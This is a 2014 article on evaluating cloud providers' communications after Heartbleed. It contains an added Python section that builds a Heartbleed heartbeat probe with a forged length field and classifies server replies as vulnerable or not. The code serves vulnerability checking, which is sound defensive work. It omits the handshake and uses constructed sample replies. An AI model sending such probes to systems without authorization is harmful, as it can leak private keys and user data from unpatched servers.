By Ryan Barrett
May 3, 2014 02:00 PM EDT
There are two pieces of good news to come out of Heartbleed. First, we haven't heard of any significant security breaches, which suggests that the industry as a whole is getting better at fixing problems as they arise.
The second is that, because Heartbleed presented every single cloud provider with the exact same challenge at the exact same time, it created an excellent global litmus test for crisis response. Everyone started from the same baseline, which removes much of the variability that normally makes responses hard to compare.
If you're a customer of the cloud, you can review any provider's public response to Heartbleed to evaluate both their technical dexterity (how long did it take them to issue a fix?) as well as their communications and customer service (did their communications assure you that you were in good hands?). And if you're a provider, you can see how your response compared to the competition - and, if necessary, make changes.
Below are a few key crisis response elements that you should look for.
Speed of Communication
In the event of a security crisis, it is critical that customers are notified as quickly as possible, and with as much pertinent information as is available. Most important, customers should know what is being done to protect them. Timing is everything. Did the company you're evaluating post a public response on its blog? On Twitter? Via email? And how quickly after the public disclosure did it start communicating?
The communication does not necessarily have to include a comprehensive action plan. But it must be enough to assure you that the service provider is aware of the issue and actively working on a solution.
Who Is Doing the Communication?
After a major security event, it is important that customers know that the service provider is taking the matter very seriously. Therefore, customer communication should be attributed to a C-level executive within the company. For something as significant as Heartbleed, you want to hear from the company's security or operations executives, not only from marketing.
Transparency About Impact and Potential Risks
If a company has been impacted, they should be open and up-front about it. They should clearly articulate which services have - and have not - been affected. It should be easy to assess the impact on users, how long they've been exposed to the risk, and what action the company has taken (e.g., systems patched, private keys regenerated and certificates reissued, old certificates revoked, session tokens invalidated). Patching alone is not enough: a key that may have leaked while the bug was live stays compromised after the fix, so a response that mentions only the patch leaves the most important question unanswered.
Responsible Disclosure Policies
It's just as important for a company to disclose what they don't know as it is to disclose what they do know. For instance, could attackers have accessed user data? Exploitation of Heartbleed left nothing in ordinary server logs, so most providers cannot prove that no data was read; an honest response says so rather than claiming certainty. Customers will also want to know where the company stands on patching, and whether there is a tool to check if a service, product, or site is still vulnerable.
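As an added example (not part of the original article, and not a tool from any provider it discusses), the following shows what such a "still vulnerable?" check actually tests. Heartbleed is a bounds bug in OpenSSL's handling of the TLS Heartbeat extension (RFC 6520): a request carries a 2-byte payload_length field, and unpatched OpenSSL 1.0.1 through 1.0.1f trusted that field and echoed back however many bytes it claimed, reading past the request into process memory. A scanner therefore sends a request whose claimed length exceeds the bytes actually present and looks at what comes back. A real scanner first sends a ClientHello advertising the heartbeat extension and waits for ServerHelloDone, then sends this record on the still-unencrypted connection; that handshake is left out here, so the code below only builds the probe record and classifies a captured reply. The sample replies are constructed, not captured from any real host; the TLS version bytes are an assumption. Only run probes like this against systems you are authorized to test.

```python
import struct

# TLS record content types (RFC 5246) and heartbeat message types (RFC 6520).
CONTENT_ALERT = 0x15
CONTENT_HEARTBEAT = 0x18
HB_REQUEST, HB_RESPONSE = 1, 2
# Assumption: TLS 1.1 on the wire; any version the server accepts works the same.
TLS_VERSION = b"\x03\x02"


def build_heartbeat_probe(claimed_length=16384, payload=b"", version=TLS_VERSION):
    """Build a heartbeat request whose payload_length field claims more bytes
    than are actually present.  RFC 6520 says a receiver must silently discard
    such a message; vulnerable OpenSSL echoes claimed_length bytes of memory."""
    if not len(payload) <= claimed_length <= 0xFFFF:
        raise ValueError("claimed_length must be >= len(payload) and fit in 16 bits")
    message = struct.pack("!BH", HB_REQUEST, claimed_length) + payload
    return struct.pack("!B2sH", CONTENT_HEARTBEAT, version, len(message)) + message


def parse_record(data):
    """Split the first TLS record off `data`; returns (content_type, body, rest)
    or None if the capture is too short to hold a whole record."""
    if len(data) < 5:
        return None
    content_type, _version, length = struct.unpack("!B2sH", data[:5])
    if len(data) < 5 + length:
        return None
    return content_type, data[5:5 + length], data[5 + length:]


def classify_response(response, sent_payload_len):
    """Classify the bytes a server returned after the probe.

    sent_payload_len is the number of payload bytes actually included in the
    request (0 for build_heartbeat_probe's default).  A server is only marked
    vulnerable if it returned a heartbeat response carrying more payload than
    we sent, i.e. it trusted the forged length field."""
    if not response:
        # Patched OpenSSL (1.0.1g and later) drops the malformed request.
        return "not vulnerable (request silently discarded)"
    rec = parse_record(response)
    if rec is None:
        return "inconclusive (truncated record)"
    content_type, body, _rest = rec
    if content_type == CONTENT_ALERT:
        return "not vulnerable (alert)"
    if content_type != CONTENT_HEARTBEAT or len(body) < 3:
        return "inconclusive (unexpected record)"
    hb_type, payload_len = struct.unpack("!BH", body[:3])
    if hb_type != HB_RESPONSE:
        return "inconclusive (unexpected record)"
    returned = len(body) - 3  # echoed payload plus >= 16 bytes of padding
    if payload_len > sent_payload_len and returned >= payload_len:
        return "VULNERABLE"
    return "not vulnerable"


def sample_responses(claimed_length=4000):
    """Constructed replies for the three outcomes (not real captures)."""
    leaked = bytes(claimed_length)  # stands in for leaked heap contents
    hb_body = struct.pack("!BH", HB_RESPONSE, claimed_length) + leaked + bytes(16)
    vulnerable = struct.pack("!B2sH", CONTENT_HEARTBEAT, TLS_VERSION, len(hb_body)) + hb_body
    # Alert record: level 2 (fatal), description 10 (unexpected_message).
    alert = struct.pack("!B2sH", CONTENT_ALERT, TLS_VERSION, 2) + b"\x02\x0a"
    return {"vulnerable": vulnerable, "alert": alert, "silence": b""}


if __name__ == "__main__":
    probe = build_heartbeat_probe(4000)
    print("probe record:", probe.hex())
    for name, reply in sample_responses(4000).items():
        print(f"{name:>10}: {classify_response(reply, 0)}")
```

Two caveats belong next to any such result. A silent timeout means the server did not echo, not that it is patched; a host running a build without the heartbeat extension gives the same silence. And the version string alone is not enough to clear a system: distributions such as Debian, Ubuntu, and Red Hat backported the fix without changing the upstream 1.0.1e version number, so on those the package changelog, not `openssl version`, is authoritative.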
Sharing of Best Practices
After the initial communication has been delivered, customers will need clarity around what next steps should be taken. IT teams will want to know if immediate upgrades are needed; users will want to know if it's time to change passwords (and, if so, whether the provider has already patched and reissued its certificates, since changing a password on a still-vulnerable service exposes the new one). It is important that customers know where to go for answers to potential questions - whether it's the company's blog, an online forum, or a support phone number. Put yourself in the shoes of a customer: if you still had questions, would it be clear from the provider's communications what you should do next?
Heartbleed may soon be history, but there will inevitably be another crisis. Use the trail of communications left behind by Heartbleed as a litmus test for crisis response. If you're a customer, make sure that all your providers delivered the level of communication you needed to feel comfortable. If you're a provider, make sure that customer communication is as much a part of your crisis response process as the technical work.